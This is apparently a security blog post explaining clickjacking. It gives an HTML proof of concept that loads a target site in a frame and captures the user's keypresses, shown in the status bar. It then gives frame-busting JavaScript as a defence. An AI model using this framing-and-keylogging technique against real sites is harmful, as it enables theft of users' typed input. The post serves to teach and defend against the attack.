Clickjacking

Clickjacking is a vulnerability where pages with sensitive functionality are placed in an invisible IFRAME that overlays seemingly innocuous content. By enticing the user to click various buttons in the innocuous content, the attacker can get victims to click buttons that perform sensitive functionality. Because the victim is actually interacting with the application through the hidden frame, the victim’s cookies containing the session identifier are being sent with each request. If they are already authenticated, any authenticated functionality would be accessible.

Steps to reproduce:
1.    Open the below HTML file with an IE browser, changing the IFRAME target to some webpage with form input.

<html>
<head>
<title>Clickjacking</title>
<script>
var keylog='Entered text: ';
function keypress() {
keylog = keylog + String.fromCharCode(window.event.keyCode);
window.status=keylog;
}
</script>
</head>
<body style="margin: 0; padding: 0"
onKeyPress="keypress()"
onLoad="this.focus()"
onBlur="this.focus()">
<div style="padding: 10px; border-bottom: 1px solid red; color=red;">
(see typed words in your status bar)
</div>
<iframe src="https://www.somesite.com/"
width="100%" height="90%" padding="0"
margin="0" frameborder="0" security="Restricted">
</body>
</head>

2. Enter text in any input field and observe that the page is hosted in an IFRAME that echoes back the entered text.   Creepy!

Pages that include form input need to prevent other pages from setting them in iframes and stealing keypresses.  The following JavaScript can be used to “break out” of any frames and ensure that the site is loaded on the top window and not in any frame controlled by the attacker.

if (top!= self) top.location.href = self.document.location;
if (parent!= self) top.location.href = location.href;
if (top.frames.length!=0) top.location=self.document.location;
if (window!= window.top) top.location.href = location.href;

Share and Enjoy:
  • Print
  • Facebook
  • Twitter
  • PDF

Leave a Reply

Your email address will not be published. Required fields are marked *